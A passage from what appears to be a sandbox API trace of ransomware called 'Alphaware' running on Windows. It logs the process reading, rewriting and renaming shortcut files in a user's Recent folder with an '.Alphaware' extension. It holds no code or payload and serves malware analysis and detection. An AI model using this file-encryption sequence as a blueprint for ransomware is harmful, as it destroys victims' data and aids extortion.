nFileSizeLow=0x12af)) returned 1 [0095.738] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AZ80w8eAVF6qLdtcVJI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\az80w8eavf6qldtcvji.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.738] ReadFile (in: hFile=0x250, lpBuffer=0x259bac0, nNumberOfBytesToRead=0x12af, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x259bac0*, lpNumberOfBytesRead=0x23e958*=0x12af, lpOverlapped=0x0) returned 1 [0095.765] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AZ80w8eAVF6qLdtcVJI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\az80w8eavf6qldtcvji.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.768] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AZ80w8eAVF6qLdtcVJI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\az80w8eavf6qldtcvji.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd08ce6a0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd15bfe40, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b46f900, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x19b4)) returned 1 [0095.768] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AZ80w8eAVF6qLdtcVJI.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\az80w8eavf6qldtcvji.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AZ80w8eAVF6qLdtcVJI.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\az80w8eavf6qldtcvji.lnk.alphaware")) returned 1 [0095.769] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bC7JKZ.swf.lnk", dwFileAttributes=0x80) returned 1 [0095.770] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bC7JKZ.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bc7jkz.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2427110 | out: lpFileInformation=0x2427110*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfbdcf00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfbdcf00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcfbdcf00, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdf5)) returned 1 [0095.770] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bC7JKZ.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bc7jkz.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.770] ReadFile (in: hFile=0x250, lpBuffer=0x24281d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24281d8*, lpNumberOfBytesRead=0x23e958*=0xdf5, lpOverlapped=0x0) returned 1 [0095.794] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bC7JKZ.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bc7jkz.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.797] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bC7JKZ.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bc7jkz.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfbdcf00, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcfbdcf00, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b4bbbc0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1374)) returned 1 [0095.797] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bC7JKZ.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bc7jkz.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bC7JKZ.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bc7jkz.swf.lnk.alphaware")) returned 1 [0095.798] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\beaeacczBwDfQo39.lnk", dwFileAttributes=0x80) returned 1 [0095.798] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\beaeacczBwDfQo39.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\beaeacczbwdfqo39.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24b0698 | out: lpFileInformation=0x24b0698*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfe64660, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd14db600, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xdb5)) returned 1 [0095.799] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\beaeacczBwDfQo39.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\beaeacczbwdfqo39.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.799] ReadFile (in: hFile=0x250, lpBuffer=0x24b1760, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24b1760*, lpNumberOfBytesRead=0x23e958*=0xdb5, lpOverlapped=0x0) returned 1 [0095.822] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\beaeacczBwDfQo39.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\beaeacczbwdfqo39.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.825] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\beaeacczBwDfQo39.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\beaeacczbwdfqo39.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfe64660, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd14db600, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b507e80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1320)) returned 1 [0095.825] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\beaeacczBwDfQo39.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\beaeacczbwdfqo39.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\beaeacczBwDfQo39.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\beaeacczbwdfqo39.lnk.alphaware")) returned 1 [0095.826] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BfF gcaOAo_F0B_.swf.lnk", dwFileAttributes=0x80) returned 1 [0095.826] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BfF gcaOAo_F0B_.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bff gcaoao_f0b_.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2539308 | out: lpFileInformation=0x2539308*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1443080, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1443080, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1443080, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0xe2d)) returned 1 [0095.826] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BfF gcaOAo_F0B_.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bff gcaoao_f0b_.swf.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.827] ReadFile (in: hFile=0x250, lpBuffer=0x253a448, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x253a448*, lpNumberOfBytesRead=0x23e958*=0xe2d, lpOverlapped=0x0) returned 1 [0095.853] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BfF gcaOAo_F0B_.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bff gcaoao_f0b_.swf.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.855] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BfF gcaOAo_F0B_.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bff gcaoao_f0b_.swf.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1443080, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1443080, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b52dfe0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x13b4)) returned 1 [0095.855] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BfF gcaOAo_F0B_.swf.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bff gcaoao_f0b_.swf.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\BfF gcaOAo_F0B_.swf.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bff gcaoao_f0b_.swf.lnk.alphaware")) returned 1 [0095.857] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bIeMKBNSsvf5WRB.lnk", dwFileAttributes=0x80) returned 1 [0095.857] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bIeMKBNSsvf5WRB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\biemkbnssvf5wrb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25c2470 | out: lpFileInformation=0x25c2470*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcffbb2c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffbb2c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xcffe1420, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x942)) returned 1 [0095.857] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bIeMKBNSsvf5WRB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\biemkbnssvf5wrb.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.857] ReadFile (in: hFile=0x250, lpBuffer=0x25c30a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25c30a8*, lpNumberOfBytesRead=0x23e958*=0x942, lpOverlapped=0x0) returned 1 [0095.891] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bIeMKBNSsvf5WRB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\biemkbnssvf5wrb.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.894] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bIeMKBNSsvf5WRB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\biemkbnssvf5wrb.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcffbb2c0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xcffbb2c0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b5a0400, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd34)) returned 1 [0095.894] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bIeMKBNSsvf5WRB.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\biemkbnssvf5wrb.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bIeMKBNSsvf5WRB.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\biemkbnssvf5wrb.lnk.alphaware")) returned 1 [0095.895] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bJTM1.flv.lnk", dwFileAttributes=0x80) returned 1 [0095.896] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bJTM1.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bjtm1.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24474c8 | out: lpFileInformation=0x24474c8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd0457d60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0457d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd0457d60, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x1302)) returned 1 [0095.896] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bJTM1.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bjtm1.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.896] ReadFile (in: hFile=0x250, lpBuffer=0x2447768, nNumberOfBytesToRead=0x1302, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2447768*, lpNumberOfBytesRead=0x23e958*=0x1302, lpOverlapped=0x0) returned 1 [0095.918] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bJTM1.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bjtm1.flv.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.921] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bJTM1.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bjtm1.flv.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd0457d60, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd0457d60, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b5ec6c0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1a34)) returned 1 [0095.921] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bJTM1.flv.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bjtm1.flv.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bJTM1.flv.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bjtm1.flv.lnk.alphaware")) returned 1 [0095.922] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bNR8T.lnk", dwFileAttributes=0x80) returned 1 [0095.922] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bNR8T.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bnr8t.lnk"), fInfoLevelId=0x0, lpFileInformation=0x24d3370 | out: lpFileInformation=0x24d3370*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd1207be0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1207be0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd1207be0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x39e)) returned 1 [0095.923] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bNR8T.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bnr8t.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.923] ReadFile (in: hFile=0x250, lpBuffer=0x24d39c0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24d39c0*, lpNumberOfBytesRead=0x23e958*=0x39e, lpOverlapped=0x0) returned 1 [0095.961] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bNR8T.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bnr8t.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.964] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bNR8T.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bnr8t.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1207be0, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd1207be0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b65eae0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5a0)) returned 1 [0095.964] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bNR8T.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bnr8t.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\bNR8T.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\bnr8t.lnk.alphaware")) returned 1 [0095.965] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CGtmsH0_nmfPfsQOHtip.lnk", dwFileAttributes=0x80) returned 1 [0095.965] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CGtmsH0_nmfPfsQOHtip.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\cgtmsh0_nmfpfsqohtip.lnk"), fInfoLevelId=0x0, lpFileInformation=0x2554c08 | out: lpFileInformation=0x2554c08*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xcfb1e820, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16ca7e0, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x9a3)) returned 1 [0095.966] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CGtmsH0_nmfPfsQOHtip.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\cgtmsh0_nmfpfsqohtip.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0095.966] ReadFile (in: hFile=0x250, lpBuffer=0x25558e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x25558e0*, lpNumberOfBytesRead=0x23e958*=0x9a3, lpOverlapped=0x0) returned 1 [0095.987] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CGtmsH0_nmfPfsQOHtip.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\cgtmsh0_nmfpfsqohtip.lnk"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0095.989] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CGtmsH0_nmfPfsQOHtip.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\cgtmsh0_nmfpfsqohtip.lnk"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfb1e820, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16ca7e0, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0x8b684c40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xdb4)) returned 1 [0095.991] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CGtmsH0_nmfPfsQOHtip.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\cgtmsh0_nmfpfsqohtip.lnk"), lpNewFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CGtmsH0_nmfPfsQOHtip.lnk.Alphaware" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\cgtmsh0_nmfpfsqohtip.lnk.alphaware")) returned 1 [0095.992] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CH482b9Cr-K.ots.lnk", dwFileAttributes=0x80) returned 1 [0095.993] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CH482b9Cr-K.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ch482b9cr-k.ots.lnk"), fInfoLevelId=0x0, lpFileInformation=0x25daa90 | out: lpFileInformation=0x25daa90*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd16f0940, ftCreationTime.dwHighDateTime=0x1d976a6, ftLastAccessTime.dwLowDateTime=0xd16f0940, ftLastAccessTime.dwHighDateTime=0x1d976a6, ftLastWriteTime.dwLowDateTime=0xd16f0940, ftLastWriteTime.dwHighDateTime=0x1d976a6, nFileSizeHigh=0x0, nFileSizeLow=0x99d)) returned 1 [0095.993] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CH482b9Cr-K.ots.lnk" (normalized: "c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\recent\\ch482b9cr-k.ots.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, 